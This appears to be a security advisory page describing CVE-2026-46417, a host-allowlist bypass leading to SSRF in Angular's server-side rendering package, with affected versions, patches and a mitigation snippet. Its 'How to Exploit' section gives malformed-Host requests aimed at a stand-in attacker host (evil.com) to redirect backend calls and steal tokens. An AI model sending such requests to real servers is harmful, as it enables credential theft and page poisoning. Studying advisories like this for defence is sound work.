@angular/platform-server, Host Allowlist Bypass leading to Server-Side Request Forgery (SSRF), CVE-2026-46417 (High Severity) -DC-Jun2026-397

Listen to this Post

🐢▶️ Listen🚀

How CVE-2026-46417 Works

The vulnerability stems from a parser discrepancy between the strict WHATWG URL parser used for host allowlist validation and the more lenient Domino URL parser used to initialize the server-emulated DOM. When a server-side request contains a malformed URL with a double port structure (e.g., http://evil.com:80:80/path`), Node.js’s `URL.canParse(url)` logic returnsfalse, causing the host‑check validation to be skipped entirely.
However, the same malformed URL is later accepted and parsed leniently by Domino’s internal parser, which resolves the origin tohttp://evil.com:80`. The Angular SSR HTTP request interceptor (relativeUrlsTransformerInterceptorFn) then resolves all relative backend HTTP requests against this adopted origin, effectively executing a Server‑Side Request Forgery (SSRF) attack.
Any Angular application using server‑side rendering (@angular/platform-server) and configuring host routing allowlists (allowedHosts) is vulnerable to this allowlist bypass. By sending an HTTP request with a malformed Host header (e.g., Host: evil.com:80:80) or an absolute‑form request URI, an attacker can bypass the allowlist logic entirely, even when a strict default‑deny setup is in place.
The SSR application will then route all relative `HttpClient` outgoing API queries—which commonly carry sensitive credentials, session cookies, and internal authorization tokens—to the attacker‑controlled server instead of the intended backend services. Additionally, the attacker can supply custom payloads back to the emulated DOM, leading to response injection and content poisoning within the rendered HTML served to users.
To successfully exploit this vulnerability, the following environment parameters and application states must all concurrently exist:
– Active Server‑Side Rendering (SSR): The application must be configured to run with Angular SSR (@angular/platform-server).
– Host Header/URI Propagation: The SSR handler must reconstruct the request URL using raw client inputs (such as request Host headers or absolute‑form URIs) and pass it as `config.url` to the rendering API (renderApplication or renderModule).
– Outbound Relative HTTP Requests: The server application must perform outbound backend API requests using relative paths (e.g., this.http.get('/api/data')) that undergo base‑URL interceptor rewriting.
– Enabled Allowed Hosts Check: The server must use the framework‑provided `allowedHosts` options to limit valid server locations.

DailyCVE Form

| Field | Value |

|–|–|

| Platform | @angular/platform-server |

| Version | <19.2.23, <20.3.22, <21.2.15, <22.0.0-rc.2 |

| Vulnerability| Server‑Side Request Forgery (SSRF), Host Allowlist Bypass |

| Severity | High (CVSS:8.8) |

| Date | 2026-05-19 |

| Prediction | Patch released on 2026‑05‑19 (already fixed) |

What Undercode Say

Check for vulnerable versions
npm list @angular/platform-server
If the version is <19.2.23, <20.3.22, <21.2.15, or <22.0.0-rc.2, update immediately.
Update to patched version
npm install @angular/[email protected]

How to Exploit

1. Craft a malformed HTTP request:

GET / HTTP/1.1
Host: evil.com:80:80

or use an absolute‑form request URI:

GET http://evil.com:80:80/path HTTP/1.1

2. Bypass allowlist validation: The strict WHATWG parser sees an invalid port and skips host checks, while the lenient Domino parser interprets the origin as http://evil.com:80`.
3. Redirect internal requests: Any relative `HttpClient` request (e.g.,this.http.get(‘/api/data’)`) will be sent to the attacker‑controlled server instead of the intended backend.
4. Exfiltrate data: The attacker can read sensitive internal API responses, steal session tokens, and poison the rendered HTML.

Protection

• Upgrade Angular to a patched version:
• v22.0.0-rc.2, v21.2.15, v20.3.22, v19.2.23 or later.
• Manually validate `req.url` before passing to rendering APIs:

  app.get('', (req, res, next) => {
  const allowedHosts = ['localhost:4000', 'trusted-domain.com'];
  if (!allowedHosts.includes(req.headers.host)) {
  return res.status(403).send('Forbidden');
  }
  next();
  });
  

• Avoid using raw client‑controlled input for URL construction.
• Implement a middleware to enforce numeric ports and validated hostnames.

Impact

• Confidentiality breach: Attackers can exfiltrate internal API responses, session cookies, and tokens.
• Internal network probing: Malicious SSRF can scan internal services and metadata endpoints (e.g., AWS IMDS).
• Response injection & content poisoning: Attackers can inject arbitrary HTML/JavaScript into the rendered page, leading to XSS or redirection.
• Bypass of all host‑based allowlists: Even a strict default‑deny allowlist is ineffective.

Patches are available in:

– `22.0.0-rc.2` (or later)
– `21.2.15` (or later)
– `20.3.22` (or later)
– `19.2.23` (or later)

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin